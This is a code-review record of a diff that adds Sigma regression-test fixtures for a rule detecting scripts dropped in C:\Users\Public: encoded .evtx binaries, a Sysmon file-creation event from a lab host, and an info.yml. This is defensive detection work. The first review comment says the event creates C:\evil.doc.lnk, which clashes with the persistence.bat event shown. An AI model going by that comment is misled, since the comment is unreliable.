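Review bot: `description: N/A` in this info.yml leaves the fixture undocumented; the accompanying JSON shows it is a Sysmon Event ID 11 in which `cmd.exe` (PID 10048) creates `C:\evil.doc.lnk` on `ar-win-dc.attackrange.local`, and a one-line description stating that, plus how the event was generated, would let a maintainer judge whether the sample still exercises the rule after future edits. The `.json` copy of the event added alongside is not referenced anywhere in `regression_tests_info` (only the `.evtx` path is, with `type: evtx`), so the description or a comment should say whether the JSON is a human-readable rendering or a second fixture the CI consumes. Since only a `Positive Detection Test` with `match_count: 1` is listed, consider adding a benign file-creation event with an expected match count of 0 so the regression also catches the rule over-matching.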
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..5c79f4658ca7a5c1eff9e455aaf469fa8080bf40 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json new file mode 100644 index 000000000..1895a93a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:52:38.278829Z" + } + }, + "EventRecordID": 74174, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:52:38.276", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Users\\Public\\persistence.bat", + "CreationUtcTime": "2025-10-24 23:52:38.276", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml new file mode 100644 index 000000000..4886f7841 --- /dev/null 
+++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml @@ -0,0 +1,13 @@ +id: 9556b96b-462a-4238-a0bf-5e11ff0408fe +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e + title: Suspicious Binaries and Scripts in Public Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx 
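Review bot: `description: N/A` should be replaced with what this fixture captures; from the JSON it is a Sysmon Event ID 11 where `cmd.exe` creates `C:\Users\Public\persistence.bat`, i.e. the script-in-Public-folder case the rule `Suspicious Binaries and Scripts in Public Folder` targets, and recording that (and the generating command) makes the `match_count: 1` expectation reviewable without opening the `.evtx`. This directory also ships a `.json` rendering of the same event that `regression_tests_info` never points at, so its role (documentation vs. consumed fixture) should be stated. With only a positive sample, a non-matching creation under `C:\Users\Public` (for example a `.txt`) with an expected count of 0 would guard the rule's extension list against accidental broadening.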
diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx new file mode 100644 index 0000000000000000000000000000000000000000..17b2b288be2b505d73331f293c561327022b3a9b GIT binary patch literal 69632 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

awOLy4UUwp$B_2}=cc>rg zf1AK_Dx$8HNw5PF>?E+Wtyi8pr}c$^N5<6#hiCJsA|Q#0Q4O9 zmpm_34!Rt;xwpQEI_%71eQ7B=TmX8^PmO*D6=7@UyKQrQ<%K24&D);dFPz*+xwn74CLf2=Wty=jcQiBvpt@7?-6!Cdx;E-#`6K;KOgf1 z)Lv+oT(cK37hDIPQ4wWQD#5CNksOSD_bxwQY)kZAhn!5FKNsKCg#J2K$ zS25a#`S|q?G130^&tUDf+FzbJ{uSeunf-;_po&~Ca|t#S*nh(QME$75J^j^>y`<0l zNXcg3|2eo|VCP5rO}ZoM5ABpqbAq{lo{DN#{`o4L*XMRUfEe$ zPqeMcprAzy{h?a zk?z=;jBb5>Mz{E`(ui4%?zOkP_}uIFWM@8j{rnrAOW%AEr@I1Ovf{VxG173%aOLA| zH(I`?jn`Rr?MqZlM}|kQfu=ELA&#ZOE?RfSC-NczeWW5{>A)Po%;=)}bl&`KjF%fA zbS<|in$385bq^&f{F(PM8q=>{v$)qAM>#K#pgAjEQl_id-R?jPx*MvDK%W?%pn=`4&VRAS<{F&ne4(3d`zwYps2cFvZ4=#s?ajO<72N@4fqAyfL9yS59!!P2C zsGp8Gt@SxZ}pN@WRLSH<2SPIMzzdY@B)jY+JEx|Ck{1Mf6=&=nEB*FZ+Sn<%{_4lZFM1FULFXyD#aI zOQuzfTYl>s+ul6E`Em@mvGVhN#XSBTtnD`FM`b8iasPY;n*o9T*?vNRauIr#hOJey zXd&{k-$IqOx;!UEf;oYi`6|MVv@(0v?oW3i9Tn%No6shO`H0@n-rjN1CzC&qZ#wEY z_b%=I7c^?MlEo05*XKSL0Wsu05y_* z9#yP(X4`J`bZT?O>b@Ai`5vVB%XfF?EACyX1aGK_vZ&>lD2sYvWN*ekHeW{K*sg9d zlhIFkY!_9avRdc!`T=tQ_IGS2jw!k>VZ8h)#NZ_Kg^CzE#sIS$gDY??xfwbdIA0u{ zLWVARByFnmlfoMpj=yao_nlZFv-AVD$Gq-$iLx;-^Z1~Fh~On;DT`C?y3E&CraDHWE*Z7??o;}j`yf^FWyK?$Vz0gnZrq;(QiVcQ18wT5j1SoyahSMEoI(7*4y5a4a|sZGZ0MJc*t?QxPLlFL`o$#53Ds8o zk`eu27_%%p6Xtdf10z|AyrQ;fe3-84SRwtX<|MLy(K#!*SL3{9 z+v{#@dA3~wnyly-ZM*0uM*ptH@BUQO@uG~j2UmPLcK=P<+;_lioAP^Y9+r8fz>R`M z9odQgP!Vmr3K;2wNCVZe%cHUtKP?{BqCZqb9-RQ@E03Bm`5A_G=%~Ay@#w3B?cWd1 zd@a3l_p|qwJ@Qd+?*I0B@qe~Gh&Gp;tp0WZz1`F01%2>kvoR)OYccMfwA>@wriA^j z?Fzr%sNrtodUa1Q`}w^w*iAyeyW)C-)F3ce@1?sF+dY3XA{5b!-tocS8iAiH^m~>) zRO*|Zx8Uw5qTLm8O!VQKCD=~MwY3^1`0!)E$Ucqo*8H|nhC~xxfGddl~blD)51dXq&YfCfXM;%7?W6&^7e8 zUHwl7@3pnBW2+hOcfaz%qvsUN%bfD==O+daS)={t&(mnuiuY+aulH`mQ-gQwfO)vZ zY7Rj^<4r$ttmPAKngg9#==m5@1iDZ}J?>Y;_UL)1&Dx(73%We{cE-=638#0Bs^8-5 z^UB{pj=eJ?k?ZmakYL5nW@#jP<F>9;<nTMtxkGah`He}gz3)5fe$!+3h$jQnkMxzP6Mv})jXk;uj z`X=mhp}dkbn|`oeHuvw#%sI74PmV9c2s#g~k(IO~TeH1?f?9A#0N1E{grQFZWPNJy zr9b=$GTSo{`o4(o!WQi{5AveYj$VkxOEJepdoAafXxG&etPWT&wBt=abSu&+Pp%VA 
